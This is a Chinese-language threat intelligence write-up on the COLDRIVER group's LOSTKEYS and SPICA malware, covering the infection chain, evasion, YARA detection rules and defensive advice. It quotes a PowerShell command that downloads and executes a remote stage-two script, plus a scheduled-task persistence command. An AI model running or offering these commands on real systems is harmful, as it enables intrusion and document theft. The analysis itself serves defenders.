1. COLDRIVER的運作背景

COLDRIVER自2019年以來針對西方政府、非政府組織、記者及與烏克蘭相關的個人進行攻擊。該組織過去專注於憑證釣魚，現在則使用進階惡意軟體選擇性地竊取文件和系統資料。

2. LOSTKEYS惡意軟體：感染鏈與技術分析

2.1 多階段傳遞機制

LOSTKEYS通過涉及社交工程和使用 PowerShell 取得 Payload 的多步驟感染鏈進行散播：

第一階段：偽造CAPTCHA誘導

• 受害者被引導至一個帶有偽造CAPTCHA驗證的釣魚頁面。
• 在「驗證」後，PowerShell指令會被複製到剪貼簿，指示使用者通過 Win + R 執行（「ClickFix」技術）。
• 範例指令：

powershell -ep bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://165.227.148[.]68/stage2.ps1')"

第二階段：虛擬機規避與Payload檢索

• 第二階段PowerShell Script檢查顯示解析度的MD5 hash，以規避虛擬機（VM）。三個特定的hash值會終止執行，可能用於過濾沙箱環境。
• 每個感染鏈使用唯一識別碼，從同一主機獲取第三階段。

第三階段：替換密碼解碼器

• 一個Base64編碼的PowerShell Script 取出兩個檔案：
1. 一個VBS「解碼器」 Script。
2. 一個編碼的 Payload blob。
• 解碼器使用每個感染鏈獨有的兩個密鑰進行 substitution cipher 。以下是GTIG提供的Python解碼邏輯：

# Args: encoded_file Ah90pE3b 4z7Klx1V
for i in range(len(x)):
    data = data.replace(x[i], '!').replace(y[i], x[i]).replace('!', y[i])

這使用兩個密鑰（ x 和 y ）重復替換字元，確保Payload混淆。

最終Payload：LOSTKEYS

• 解碼的VBS腳本（LOSTKEYS）從預定義目錄（例如 .docx 、 .pdf ）竊取檔案，並外洩系統metadata（例如進程、網路配置）。

3. SPICA後門：基於Rust的持久性與C2

3.1 通過加密PDF誘導傳遞

• COLDRIVER發送帶有加密文字的無害PDF，誘導受害者從雲端儲存下載「解密工具」。該工具， SPICA ，是一個Rust編譯的後門。

3.2 技術能力

• 持久性 ：通過混淆的PowerShell建立名為 CalendarChecker 的排程任務：

schtasks /create /tn "CalendarChecker" /tr "C:\Windows\System32\wscript.exe C:\Users\Public\doc.vbs" /sc hourly

• C2通訊 ：使用WebSocket上的JSON進行雙向指令執行。
• 功能 ：
• 執行Shell指令。
• 竊取瀏覽器Cookie（Chrome、Firefox、Edge、Opera）。
• 列舉並歸檔文件以供外洩。
• 檔案上傳/下載功能。

3.3 程式碼結構與檢測

• SPICA的Rust程式碼包括模組化元件，例如 Dox （文件列舉）和 Telegram （功能不明）。YARA規則中的關鍵字串包括：

$s9 = "spica"
$s11 = "Card Holder: Bull Gayts" (decoy PDF metadata)

• YARA規則通過匹配15個字串中的7個或11個檔案路徑中的5個（例如 agent\src\command\shell.rs ）來檢測SPICA。

4. 規避與歸因洞察

4.1 反分析技術

• 虛擬機檢測 ：LOSTKEYS使用顯示解析度雜湊，而SPICA嵌入誘騙文件以模擬合法性。
• 混淆 ：兩種惡意軟體家族均使用每個活動獨有的密鑰和模組化Payload檢索，以規避使用簽章的檢測。

4.2 與歷史活動的連結

• 2023年12月的SPICA樣本顯示與其他FSB相關團體的程式碼重用或合作。然而，GTIG指出這些是否早於COLDRIVER 2025年活動尚不確定。

5. 防禦建議

1. 限制腳本執行 ：在企業環境中預設禁用PowerShell和WScript。
2. 啟用進階保護 ：使用Google的進階保護計畫(Advanced Protection Program)和增強安全瀏覽(Enhanced Safe Browsing)功能來封鎖惡意網域。
3. 監控排程任務 ：標記可疑任務，如 CalendarChecker 或不正常的VBS執行。
4. 應用YARA規則 ：部署GTIG的LOSTKEYS和SPICA規則來檢測Payload。

結論

COLDRIVER 採用客製化惡意軟體標誌著其向持續、低容量間諜活動的策略轉變。該組織使用substitution ciphers、基於Rust的Payload和社交工程，反映了與FSB更廣泛網路目標的一致性。防禦者必須優先進行行為分析和基礎設施監控，以對抗這些不斷演變的威脅。

參考資料

1. COLDRIVER Using New Malware To Steal Documents From Western Targets and NGOs
2. APT Group Attribution (GitHub)
3. Russian Threat Group COLDRIVER Expands Targeting
4. Google Finds Data Theft Malware Used by Russian APT
5. Russia's ColdRiver APT Unleashes Custom 'Spica' Malware
6. Google TAG Warns of COLDRIVER Backdoor
7. Coldriver Threat Group Targets High-Ranking Officials

附錄：程式碼片段

LOSTKEYS解碼器（Python）

# From GTIG's analysis
import base64
import sys
# ... (see full code in source)

SPICA YARA規則

rule SPICA__Strings {
  meta:
    author = "Google TAG"
    description = "Rust backdoor using websockets for c2 and embedded decoy PDF"
  strings:
    $s9 = "spica"
    $s11 = "Card Holder: Bull Gayts"
    # ... (full rule in source)